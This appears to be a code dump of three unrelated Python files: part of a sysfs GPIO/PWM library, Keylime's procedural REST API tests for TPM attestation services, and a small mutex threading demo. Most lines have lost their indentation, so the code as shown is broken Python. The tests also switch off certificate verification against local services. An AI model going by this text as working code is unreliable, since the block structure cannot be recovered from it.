var_gpio_filepath = var_gpio_root + "/unexport"
with open(var_gpio_filepath, 'w') as file:
file.write(str(gpio_index))
var_gpio_cleared = 1
except:
print("Error: Unknown failure while performing cleanup")
if (var_gpio_cleared == 0) and (warningmode == 1):
print("No channels have been set up yet - nothing to clean up! Try cleaning up at the end of your program instead!")
# If a channel is specified...
else:
        # If channel is an integer, convert it to a list
        if isinstance(channel, int):
            channel = [channel]
        # Iterate through the channel list
for index in range(len(channel)):
# Translate the GPIO based on the current gpio_mode
channel_int = get_gpio_number(channel[index])
if channel_int == None:
return
# Cleanup specified GPIO
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel_int) + "/value"
var_gpio_exists = os.path.exists(var_gpio_filepath)
if var_gpio_exists == 1:
try:
var_gpio_filepath = var_gpio_root + "/unexport"
with open(var_gpio_filepath, 'w') as file:
file.write(str(channel_int))
except:
print("Error: Unknown failure while performing cleanup")
# PWM Class
class PWM:
def __init__(self, channel, frequency):
# Translate the GPIO based on the current gpio_mode
channel_int = get_gpio_number(channel)
# Perform sanity checks
if channel_int == None:
return
if validate_direction(channel, 'output') == 0:
return
if frequency <= 0.0:
print("frequency must be greater than 0.0")
return
self.freq = frequency
self.gpio = channel_int
self.state = 0
return
def start(self, dutycycle, pwm_precision=HIGH):
if (dutycycle < 0.0) or (dutycycle > 100.0):
print("dutycycle must have a value from 0.0 to 100.0")
return
self.precision = pwm_precision
self.dutycycle = dutycycle
self.pwm_calc()
self.p = Process(target=self.pwm_process, args=(self.gpio, self.sleep_high, self.sleep_low, self.precision), name='pwm_process')
self.p.start()
self.state = 1
def stop(self):
self.p.terminate()
self.p.join()
self.state = 0
@staticmethod
def pwm_busywait(wait_time):
current_time = time()
while (time() < current_time+wait_time):
pass
def pwm_calc(self):
self.sleep_low = (1.0 / self.freq) * ((100 - self.dutycycle) / 100.0)
self.sleep_high = (1.0 / self.freq) * ((100 - (100 - self.dutycycle)) / 100.0)
@staticmethod
def pwm_process(channel, sleep_high, sleep_low, precision=HIGH):
var_gpio_filepath = str(var_gpio_root) + "/gpio" + str(channel) + "/value"
# Note: Low precision mode greatly reduces CPU usage, but accuracy will depend upon your kernel.
# p.start(dutycycle, pwm_precision=GPIO.LOW)
try:
if precision == HIGH:
while True:
with open(var_gpio_filepath, 'w') as file:
file.write('1')
PWM.pwm_busywait(sleep_high)
with open(var_gpio_filepath, 'w') as file:
file.write('0')
PWM.pwm_busywait(sleep_low)
else:
while True:
with open(var_gpio_filepath, 'w') as file:
file.write('1')
sleep(sleep_high)
with open(var_gpio_filepath, 'w') as file:
file.write('0')
sleep(sleep_low)
except:
try:
with open(var_gpio_filepath, 'w') as file:
file.write('0')
except:
pass
print("Warning: PWM process ended prematurely")
def ChangeFrequency(self, frequency):
self.freq = frequency
if self.state == 1:
self.stop()
self.start(self.dutycycle)
def ChangeDutyCycle(self, dutycycle):
self.dutycycle = dutycycle
if self.state == 1:
self.stop()
self.start(self.dutycycle)
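
# A minimal usage sketch (illustration only, not part of the library). The pin
# number and PWM settings below are arbitrary assumptions for a ROCK64 board,
# and writing to /sys/class/gpio generally requires root privileges.
if __name__ == '__main__':
    setmode(BOARD)               # interpret channel numbers as physical pin numbers
    setup(3, OUT, initial=LOW)   # export the pin and configure it as an output
    output(3, HIGH)              # drive the pin high
    pwm = PWM(3, 50)             # 50 Hz software PWM on the same pin
    pwm.start(25)                # 25% duty cycle
    sleep(1)
    pwm.stop()
    cleanup(3)                   # unexport the pin when done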
|
test_restful.py
|
#!/usr/bin/python3
'''
SPDX-License-Identifier: Apache-2.0
Copyright 2017 Massachusetts Institute of Technology.
NOTE:
This unittest is being used as a procedural test.
The tests must be run in-order and CANNOT be parallelized!
Tests all but two RESTful interfaces:
* agent's POST /v2/keys/vkey
- Done by CV after the CV's POST /v2/agents/{UUID} command is performed
* CV's PUT /v2/agents/{UUID}
- POST already bootstraps agent, so PUT is redundant in this test
The registrar's PUT vactivate interface is only tested if a vTPM is present!
USAGE:
Should be run in test directory under root privileges with either command:
* python -m unittest -v test_restful
* green -vv
(with `pip install green`)
To run without root privileges, be sure to export KEYLIME_TEST=True
For Python Coverage support (pip install coverage), set env COVERAGE_FILE and:
* coverage run --parallel-mode test_restful.py
'''
import sys
import signal
import unittest
import subprocess
import time
import os
import base64
import threading
import shutil
import errno
from pathlib import Path
import dbus
import simplejson as json
from keylime import config
from keylime import tornado_requests
from keylime.requests_client import RequestsClient
from keylime import tenant
from keylime import crypto
from keylime.cmd import user_data_encrypt
from keylime import secure_mount
from keylime.tpm import tpm_main
from keylime.tpm import tpm_abstract
# Coverage support
if "COVERAGE_FILE" in os.environ:
FORK_ARGS = ["coverage", "run", "--parallel-mode"]
if "COVERAGE_DIR" in os.environ:
FORK_ARGS += ["--rcfile=" + os.environ["COVERAGE_DIR"] + "/.coveragerc"]
else:
FORK_ARGS = ["python3"]
# Custom imports
PACKAGE_ROOT = Path(__file__).parents[1]
KEYLIME_DIR = (f"{PACKAGE_ROOT}/keylime")
sys.path.append(KEYLIME_DIR)
# Custom imports
# PACKAGE_ROOT = Path(__file__).parents[1]
# CODE_ROOT = (f"{PACKAGE_ROOT}/keylime/")
# sys.path.insert(0, CODE_ROOT)
# Will be used to communicate with the TPM
tpm_instance = None
# cmp was removed in Python 3, so let's recreate it.
def cmp(a, b):
return (a > b) - (a < b)
# Ensure this is run as root
if os.geteuid() != 0 and config.REQUIRE_ROOT:
sys.exit("Tests need to be run with root privileges, or set env KEYLIME_TEST=True!")
# Force sorting tests alphabetically
unittest.TestLoader.sortTestMethodsUsing = lambda _, x, y: cmp(x, y)
# Environment to pass to services
script_env = os.environ.copy()
# Globals to keep track of Keylime components
cv_process = None
reg_process = None
agent_process = None
tenant_templ = None
# Class-level components that are not static (so can't be added to test class)
public_key = None
keyblob = None
ek_tpm = None
aik_tpm = None
vtpm = False
# Set up mTLS
my_cert = config.get('tenant', 'my_cert')
my_priv_key = config.get('tenant', 'private_key')
cert = (my_cert, my_priv_key)
tls_enabled = True
# Like os.remove, but ignore file DNE exceptions
def fileRemove(path):
try:
os.remove(path)
except OSError as e:
# Ignore if file does not exist
if e.errno != errno.ENOENT:
raise
# Boring setup stuff
def setUpModule():
try:
env = os.environ.copy()
env['PATH'] = env['PATH'] + ":/usr/local/bin"
# Run init_tpm_server and tpm_serverd (start fresh)
its = subprocess.Popen(["init_tpm_server"], shell=False, env=env)
its.wait()
tsd = subprocess.Popen(["tpm_serverd"], shell=False, env=env)
tsd.wait()
except Exception as e:
print("WARNING: Restarting TPM emulator failed!")
# Note: the following is required as abrmd is failing to reconnect to MSSIM, once
    # MSSIM is killed and restarted. If this proves to be an actual bug and is
# fixed upstream, the following dbus restart call can be removed.
try:
sysbus = dbus.SystemBus()
systemd1 = sysbus.get_object('org.freedesktop.systemd1', '/org/freedesktop/systemd1')
manager = dbus.Interface(systemd1, 'org.freedesktop.systemd1.Manager')
# If the systemd service exists, let's restart it.
for service in sysbus.list_names():
if "com.intel.tss2.Tabrmd" in service:
print("Found dbus service:", str(service))
try:
print("Restarting tpm2-abrmd.service.")
manager.RestartUnit('tpm2-abrmd.service', 'fail')
except dbus.exceptions.DBusException as e:
print(e)
except Exception as e:
print("Non systemd agent detected, no tpm2-abrmd restart required.")
try:
# Start with a clean slate for this test
fileRemove(config.WORK_DIR + "/tpmdata.yaml")
fileRemove(config.WORK_DIR + "/cv_data.sqlite")
fileRemove(config.WORK_DIR + "/reg_data.sqlite")
shutil.rmtree(config.WORK_DIR + "/cv_ca", True)
except Exception as e:
print("WARNING: Cleanup of TPM files failed!")
# CV must be run first to create CA and certs!
launch_cloudverifier()
launch_registrar()
# launch_cloudagent()
# Make the Tenant do a lot of set-up work for us
global tenant_templ
tenant_templ = tenant.Tenant()
tenant_templ.agent_uuid = config.get('cloud_agent', 'agent_uuid')
tenant_templ.cloudagent_ip = "localhost"
tenant_templ.cloudagent_port = config.get('cloud_agent', 'cloudagent_port')
tenant_templ.verifier_ip = config.get('cloud_verifier', 'cloudverifier_ip')
tenant_templ.verifier_port = config.get('cloud_verifier', 'cloudverifier_port')
tenant_templ.registrar_ip = config.get('registrar', 'registrar_ip')
tenant_templ.registrar_boot_port = config.get('registrar', 'registrar_port')
tenant_templ.registrar_tls_boot_port = config.get('registrar', 'registrar_tls_port')
tenant_templ.registrar_base_url = f'{tenant_templ.registrar_ip}:{tenant_templ.registrar_boot_port}'
tenant_templ.registrar_base_tls_url = f'{tenant_templ.registrar_ip}:{tenant_templ.registrar_tls_boot_port}'
tenant_templ.agent_base_url = f'{tenant_templ.cloudagent_ip}:{tenant_templ.cloudagent_port}'
# Set up TLS
my_tls_cert, my_tls_priv_key = tenant_templ.get_tls_context()
tenant_templ.cert = (my_tls_cert, my_tls_priv_key)
# Destroy everything on teardown
def tearDownModule():
# Tear down in reverse order of dependencies
kill_cloudagent()
kill_cloudverifier()
kill_registrar()
def launch_cloudverifier():
"""Start up the cloud verifier"""
global cv_process, script_env, FORK_ARGS
if cv_process is None:
cv_process = subprocess.Popen("keylime_verifier",
shell=False,
preexec_fn=os.setsid,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=script_env)
def initthread():
sys.stdout.write('\033[96m' + "\nCloud Verifier Thread" + '\033[0m')
while True:
line = cv_process.stdout.readline()
if line == b'':
break
line = line.decode('utf-8')
line = line.rstrip(os.linesep)
sys.stdout.flush()
sys.stdout.write('\n\033[96m' + line + '\033[0m')
t = threading.Thread(target=initthread)
t.start()
time.sleep(30)
return True
def launch_registrar():
"""Start up the registrar"""
global reg_process, script_env, FORK_ARGS
if reg_process is None:
reg_process = subprocess.Popen("keylime_registrar",
shell=False,
preexec_fn=os.setsid,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=script_env)
def initthread():
sys.stdout.write('\033[95m' + "\nRegistrar Thread" + '\033[0m')
while True:
line = reg_process.stdout.readline()
if line == b"":
break
# line = line.rstrip(os.linesep)
line = line.decode('utf-8')
sys.stdout.flush()
sys.stdout.write('\n\033[95m' + line + '\033[0m')
t = threading.Thread(target=initthread)
t.start()
time.sleep(10)
return True
def launch_cloudagent():
"""Start up the cloud agent"""
global agent_process, script_env, FORK_ARGS
if agent_process is None:
agent_process = subprocess.Popen("keylime_agent",
shell=False,
preexec_fn=os.setsid,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=script_env)
def initthread():
sys.stdout.write('\033[94m' + "\nCloud Agent Thread" + '\033[0m')
while True:
line = agent_process.stdout.readline()
if line == b'':
break
# line = line.rstrip(os.linesep)
line = line.decode('utf-8')
sys.stdout.flush()
sys.stdout.write('\n\033[94m' + line + '\033[0m')
t = threading.Thread(target=initthread)
t.start()
time.sleep(10)
return True
def kill_cloudverifier():
"""Kill the cloud verifier"""
global cv_process
if cv_process is None:
return
os.killpg(os.getpgid(cv_process.pid), signal.SIGINT)
cv_process.wait()
cv_process = None
def kill_registrar():
"""Kill the registrar"""
global reg_process
if reg_process is None:
return
os.killpg(os.getpgid(reg_process.pid), signal.SIGINT)
reg_process.wait()
reg_process = None
def kill_cloudagent():
"""Kill the cloud agent"""
global agent_process
if agent_process is None:
return
os.killpg(os.getpgid(agent_process.pid), signal.SIGINT)
agent_process.wait()
agent_process = None
def services_running():
if reg_process.poll() is None and cv_process.poll() is None:
return True
return False
class TestRestful(unittest.TestCase):
# Static class members (won't change between tests)
payload = None
auth_tag = None
tpm_policy = {}
vtpm_policy = {}
metadata = {}
allowlist = {}
revocation_key = ""
mb_refstate = None
K = None
U = None
V = None
api_version = config.API_VERSION
cloudagent_ip = None
cloudagent_port = None
@classmethod
def setUpClass(cls):
"""Prepare the keys and payload to give to the CV"""
contents = "random garbage to test as payload"
# contents = contents.encode('utf-8')
ret = user_data_encrypt.encrypt(contents)
cls.K = ret['k']
cls.U = ret['u']
cls.V = ret['v']
cls.payload = ret['ciphertext']
# Set up to register an agent
cls.auth_tag = crypto.do_hmac(cls.K, tenant_templ.agent_uuid)
# Prepare policies for agent
cls.tpm_policy = config.get('tenant', 'tpm_policy')
cls.vtpm_policy = config.get('tenant', 'vtpm_policy')
cls.tpm_policy = tpm_abstract.TPM_Utilities.readPolicy(cls.tpm_policy)
cls.vtpm_policy = tpm_abstract.TPM_Utilities.readPolicy(cls.vtpm_policy)
# Allow targeting a specific API version (default latest)
cls.api_version = config.API_VERSION
def setUp(self):
"""Nothing to set up before each test"""
return
def test_000_services(self):
"""Ensure everyone is running before doing tests"""
self.assertTrue(services_running(), "Not all services started successfully!")
# Registrar Testset
def test_010_reg_agent_post(self):
"""Test registrar's POST /v2/agents/{UUID} Interface"""
global keyblob, vtpm, tpm_instance, ek_tpm, aik_tpm
contact_ip = "127.0.0.1"
contact_port = 9002
tpm_instance = tpm_main.tpm()
# Change CWD for TPM-related operations
cwd = os.getcwd()
config.ch_dir(config.WORK_DIR, None)
_ = secure_mount.mount()
# Initialize the TPM with AIK
(ekcert, ek_tpm, aik_tpm) = tpm_instance.tpm_init(self_activate=False,
config_pw=config.get('cloud_agent', 'tpm_ownerpassword'))
vtpm = tpm_instance.is_vtpm()
# Handle virtualized and emulated TPMs
if ekcert is None:
if vtpm:
ekcert = 'virtual'
elif tpm_instance.is_emulator():
ekcert = 'emulator'
# Get back to our original CWD
config.ch_dir(cwd, None)
data = {
'ekcert': ekcert,
'aik_tpm': aik_tpm,
'ip': contact_ip,
'port': contact_port
}
if ekcert is None or ekcert == 'emulator':
data['ek_tpm'] = ek_tpm
test_010_reg_agent_post = RequestsClient(tenant_templ.registrar_base_url, tls_enabled=False)
response = test_010_reg_agent_post.post(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
data=json.dumps(data),
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Registrar agent Add return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("blob", json_response["results"], "Malformed response body!")
keyblob = json_response["results"]["blob"]
self.assertIsNotNone(keyblob, "Malformed response body!")
@unittest.skipIf(vtpm, "Registrar's PUT /v2/agents/{UUID}/activate only for non-vTPMs!")
def test_011_reg_agent_activate_put(self):
"""Test registrar's PUT /v2/agents/{UUID}/activate Interface"""
global keyblob
self.assertIsNotNone(keyblob, "Required value not set. Previous step may have failed?")
key = tpm_instance.activate_identity(keyblob)
data = {
'auth_tag': crypto.do_hmac(key, tenant_templ.agent_uuid),
}
test_011_reg_agent_activate_put = RequestsClient(tenant_templ.registrar_base_url, tls_enabled=False)
response = test_011_reg_agent_activate_put.put(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}/activate',
data=json.dumps(data),
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Registrar agent Activate return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def test_013_reg_agents_get(self):
"""Test registrar's GET /v2/agents Interface"""
test_013_reg_agents_get = RequestsClient(tenant_templ.registrar_base_tls_url, tls_enabled=True)
response = test_013_reg_agents_get.get(
f'/v{self.api_version}/agents/',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Registrar agent List return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("uuids", json_response["results"], "Malformed response body!")
# We registered exactly one agent so far
self.assertEqual(1, len(json_response["results"]["uuids"]), "Incorrect system state!")
def test_014_reg_agent_get(self):
"""Test registrar's GET /v2/agents/{UUID} Interface"""
test_014_reg_agent_get = RequestsClient(tenant_templ.registrar_base_tls_url, tls_enabled=True)
response = test_014_reg_agent_get.get(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Registrar agent return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("ek_tpm", json_response["results"], "Malformed response body!")
self.assertIn("aik_tpm", json_response["results"], "Malformed response body!")
self.assertIn("ekcert", json_response["results"], "Malformed response body!")
self.assertIn("ip", json_response["results"], "Malformed response body!")
self.assertIn("port", json_response["results"], "Malformed response body!")
global aik_tpm
aik_tpm = json_response["results"]["aik_tpm"]
def test_015_reg_agent_delete(self):
"""Test registrar's DELETE /v2/agents/{UUID} Interface"""
test_015_reg_agent_delete = RequestsClient(tenant_templ.registrar_base_tls_url, tls_enabled=True)
response = test_015_reg_agent_delete.delete(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Registrar Delete return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
# Agent Setup Testset
def test_020_agent_keys_pubkey_get(self):
"""Test agent's GET /v2/keys/pubkey Interface"""
# We want a real cloud agent to communicate with!
launch_cloudagent()
time.sleep(10)
test_020_agent_keys_pubkey_get = RequestsClient(tenant_templ.agent_base_url, tls_enabled=False)
response = test_020_agent_keys_pubkey_get.get(
f'/v{self.api_version}/keys/pubkey',
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Agent pubkey return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("pubkey", json_response["results"], "Malformed response body!")
global public_key
public_key = json_response["results"]["pubkey"]
self.assertNotEqual(public_key, None, "Malformed response body!")
def test_021_reg_agent_get(self):
# We need to refresh the aik value we've stored in case it changed
self.test_014_reg_agent_get()
def test_022_agent_quotes_identity_get(self):
"""Test agent's GET /v2/quotes/identity Interface"""
self.assertIsNotNone(aik_tpm, "Required value not set. Previous step may have failed?")
nonce = tpm_abstract.TPM_Utilities.random_password(20)
numretries = config.getint('tenant', 'max_retries')
while numretries >= 0:
test_022_agent_quotes_identity_get = RequestsClient(tenant_templ.agent_base_url, tls_enabled=False)
response = test_022_agent_quotes_identity_get.get(
f'/v{self.api_version}/quotes/identity?nonce={nonce}',
data=None,
cert="",
verify=False
)
if response.status_code == 200:
break
numretries -= 1
time.sleep(config.getint('tenant', 'retry_interval'))
self.assertEqual(response.status_code, 200, "Non-successful Agent identity return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("quote", json_response["results"], "Malformed response body!")
self.assertIn("pubkey", json_response["results"], "Malformed response body!")
# Check the quote identity
self.assertTrue(tpm_instance.check_quote(tenant_templ.agent_uuid,
nonce,
json_response["results"]["pubkey"],
json_response["results"]["quote"],
aik_tpm,
hash_alg=json_response["results"]["hash_alg"]),
"Invalid quote!")
@unittest.skip("Testing of agent's POST /v2/keys/vkey disabled! (spawned CV should do this already)")
def test_023_agent_keys_vkey_post(self):
"""Test agent's POST /v2/keys/vkey Interface"""
# CV should do this (during CV POST/PUT test)
# Running this test might hide problems with the CV sending the V key
global public_key
self.assertIsNotNone(self.V, "Required value not set. Previous step may have failed?")
self.assertIsNotNone(public_key, "Required value not set. Previous step may have failed?")
encrypted_V = crypto.rsa_encrypt(crypto.rsa_import_pubkey(public_key), str(self.V))
b64_encrypted_V = base64.b64encode(encrypted_V)
data = {'encrypted_key': b64_encrypted_V}
test_023_agent_keys_vkey_post = RequestsClient(tenant_templ.agent_base_url, tls_enabled=False)
response = test_023_agent_keys_vkey_post.post(
f'/v{self.api_version}/keys/vkey',
data=json.dumps(data),
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Agent vkey post return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def test_024_agent_keys_ukey_post(self):
"""Test agents's POST /v2/keys/ukey Interface"""
global public_key
self.assertIsNotNone(public_key, "Required value not set. Previous step may have failed?")
self.assertIsNotNone(self.U, "Required value not set. Previous step may have failed?")
self.assertIsNotNone(self.auth_tag, "Required value not set. Previous step may have failed?")
self.assertIsNotNone(self.payload, "Required value not set. Previous step may have failed?")
encrypted_U = crypto.rsa_encrypt(crypto.rsa_import_pubkey(public_key), self.U)
b64_encrypted_u = base64.b64encode(encrypted_U)
data = {
'encrypted_key': b64_encrypted_u,
'auth_tag': self.auth_tag,
'payload': self.payload
}
test_024_agent_keys_ukey_post = RequestsClient(tenant_templ.agent_base_url, tls_enabled=False)
response = test_024_agent_keys_ukey_post.post(
f'/v{self.api_version}/keys/ukey',
data=json.dumps(data),
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Agent ukey post return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def test_025_cv_allowlist_post(self):
"""Test CV's POST /v2/allowlist/{name} Interface"""
data = {
'name': 'test-allowlist',
'tpm_policy': json.dumps(self.tpm_policy),
'vtpm_policy': json.dumps(self.vtpm_policy),
'ima_policy': json.dumps(self.allowlist),
}
cv_client = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = cv_client.post(
'/allowlists/test-allowlist',
data=json.dumps(data),
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 201, "Non-successful CV allowlist Post return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def test_026_cv_allowlist_get(self):
"""Test CV's GET /v2/allowlists/{name} Interface"""
cv_client = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = cv_client.get(
'/allowlists/test-allowlist',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful CV allowlist Post return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
results = json_response['results']
self.assertEqual(results['name'], 'test-allowlist')
self.assertEqual(results['tpm_policy'], json.dumps(self.tpm_policy))
self.assertEqual(results['vtpm_policy'], json.dumps(self.vtpm_policy))
self.assertEqual(results['ima_policy'], json.dumps(self.allowlist))
def test_027_cv_allowlist_delete(self):
"""Test CV's DELETE /v2/allowlists/{name} Interface"""
cv_client = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = cv_client.delete(
'/allowlists/test-allowlist',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 204, "Non-successful CV allowlist Delete return code!")
# Cloud Verifier Testset
def test_030_cv_agent_post(self):
"""Test CV's POST /v2/agents/{UUID} Interface"""
self.assertIsNotNone(self.V, "Required value not set. Previous step may have failed?")
b64_v = base64.b64encode(self.V)
data = {
'v': b64_v,
'cloudagent_ip': tenant_templ.cloudagent_ip,
'cloudagent_port': tenant_templ.cloudagent_port,
'tpm_policy': json.dumps(self.tpm_policy),
'vtpm_policy': json.dumps(self.vtpm_policy),
'allowlist': json.dumps(self.allowlist),
'ima_sign_verification_keys': '',
'mb_refstate': None,
'metadata': json.dumps(self.metadata),
'revocation_key': self.revocation_key,
'accept_tpm_hash_algs': config.get('tenant', 'accept_tpm_hash_algs').split(','),
'accept_tpm_encryption_algs': config.get('tenant', 'accept_tpm_encryption_algs').split(','),
'accept_tpm_signing_algs': config.get('tenant', 'accept_tpm_signing_algs').split(','),
}
test_030_cv_agent_post = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = test_030_cv_agent_post.post(
f'/agents/{tenant_templ.agent_uuid}',
data=json.dumps(data),
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful CV agent Post return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
time.sleep(10)
@unittest.skip("Testing of CV's PUT /v2/agents/{UUID} disabled!")
def test_031_cv_agent_put(self):
"""Test CV's PUT /v2/agents/{UUID} Interface"""
# TODO: this should actually test PUT functionality (e.g., make agent fail and then PUT back up)
test_031_cv_agent_put = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = test_031_cv_agent_put.put(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
data=b'',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful CV agent Post return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def test_032_cv_agents_get(self):
"""Test CV's GET /v2/agents Interface"""
test_032_cv_agents_get = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = test_032_cv_agents_get.get(
f'/v{self.api_version}/agents/',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful CV agent List return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("uuids", json_response["results"], "Malformed response body!")
# Be sure our agent is registered
self.assertEqual(1, len(json_response["results"]["uuids"]))
def test_033_cv_agent_get(self):
"""Test CV's GET /v2/agents/{UUID} Interface"""
test_033_cv_agent_get = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = test_033_cv_agent_get.get(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful CV agent return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
# Check a few of the important properties are present
self.assertIn("operational_state", json_response["results"], "Malformed response body!")
self.assertIn("ip", json_response["results"], "Malformed response body!")
self.assertIn("port", json_response["results"], "Malformed response body!")
def test_034_cv_agent_post_invalid_exclude_list(self):
"""Test CV's POST /v2/agents/{UUID} Interface"""
self.assertIsNotNone(self.V, "Required value not set. Previous step may have failed?")
b64_v = base64.b64encode(self.V)
# Set unsupported regex in exclude list
allowlist = {'exclude': ['*']}
data = {
'v': b64_v,
'mb_refstate': None,
'cloudagent_ip': tenant_templ.cloudagent_ip,
'cloudagent_port': tenant_templ.cloudagent_port,
'tpm_policy': json.dumps(self.tpm_policy),
'vtpm_policy': json.dumps(self.vtpm_policy),
'allowlist': json.dumps(allowlist),
'ima_sign_verification_keys': '',
'metadata': json.dumps(self.metadata),
'revocation_key': self.revocation_key,
'accept_tpm_hash_algs': config.get('tenant', 'accept_tpm_hash_algs').split(','),
'accept_tpm_encryption_algs': config.get('tenant', 'accept_tpm_encryption_algs').split(','),
'accept_tpm_signing_algs': config.get('tenant', 'accept_tpm_signing_algs').split(','),
}
client = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = client.post(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
cert=tenant_templ.cert,
data=json.dumps(data),
verify=False
)
self.assertEqual(response.status_code, 400, "Successful CV agent Post return code!")
# Ensure response is well-formed
json_response = response.json()
self.assertIn("results", json_response, "Malformed response body!")
# Agent Poll Testset
def test_040_agent_quotes_integrity_get(self):
"""Test agent's GET /v2/quotes/integrity Interface"""
global public_key
self.assertIsNotNone(aik_tpm, "Required value not set. Previous step may have failed?")
nonce = tpm_abstract.TPM_Utilities.random_password(20)
mask = self.tpm_policy["mask"]
vmask = self.vtpm_policy["mask"]
partial = "1"
if public_key is None:
partial = "0"
test_040_agent_quotes_integrity_get = RequestsClient(tenant_templ.agent_base_url, tls_enabled=False)
response = test_040_agent_quotes_integrity_get.get(
f'/v{self.api_version}/quotes/integrity?nonce={nonce}&mask={mask}&vmask={vmask}&partial={partial}',
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Agent Integrity Get return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("quote", json_response["results"], "Malformed response body!")
if public_key is None:
self.assertIn("pubkey", json_response["results"], "Malformed response body!")
public_key = json_response["results"]["pubkey"]
self.assertIn("hash_alg", json_response["results"], "Malformed response body!")
quote = json_response["results"]["quote"]
hash_alg = json_response["results"]["hash_alg"]
validQuote = tpm_instance.check_quote(tenant_templ.agent_uuid,
nonce,
public_key,
quote,
aik_tpm,
self.tpm_policy,
hash_alg=hash_alg)
self.assertTrue(validQuote)
async def test_041_agent_keys_verify_get(self):
"""Test agent's GET /v2/keys/verify Interface
We use async here to allow function await while key processes"""
self.assertIsNotNone(self.K, "Required value not set. Previous step may have failed?")
challenge = tpm_abstract.TPM_Utilities.random_password(20)
encoded = base64.b64encode(self.K).decode('utf-8')
response = tornado_requests.request("GET",
"http://%s:%s/keys/verify?challenge=%s" % (self.cloudagent_ip, self.cloudagent_port, challenge))
response = await response
self.assertEqual(response.status, 200, "Non-successful Agent verify return code!")
json_response = json.loads(response.read().decode())
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("hmac", json_response["results"], "Malformed response body!")
# Be sure response is valid
mac = json_response['results']['hmac']
ex_mac = crypto.do_hmac(encoded, challenge)
# ex_mac = crypto.do_hmac(self.K, challenge)
self.assertEqual(mac, ex_mac, "Agent failed to validate challenge code!")
# CV Cleanup Testset
def test_050_cv_agent_delete(self):
"""Test CV's DELETE /v2/agents/{UUID} Interface"""
time.sleep(5)
test_050_cv_agent_delete = RequestsClient(tenant_templ.verifier_base_url, tls_enabled)
response = test_050_cv_agent_delete.delete(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 202, "Non-successful CV agent Delete return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def tearDown(self):
"""Nothing to bring down after each test"""
return
@classmethod
def tearDownClass(cls):
"""Nothing to bring down"""
return
if __name__ == '__main__':
unittest.main()
|
mutex.py
|
import time
from threading import Thread, Lock
mutex = Lock()
def foo(id):
mutex.acquire() # comment out this line of code to test what happens without the mutex
for _ in range(100):
print("Thread id:", id)
time.sleep(0.05)
mutex.release() # comment out this line of code to test what happens without the mutex
if __name__ == "__main__":
print("MAIN FUNCTION STARTS")
threads = []
for i in range(4):
threads.append(Thread(target=foo, args=(i,)))
for thread in threads:
thread.start()
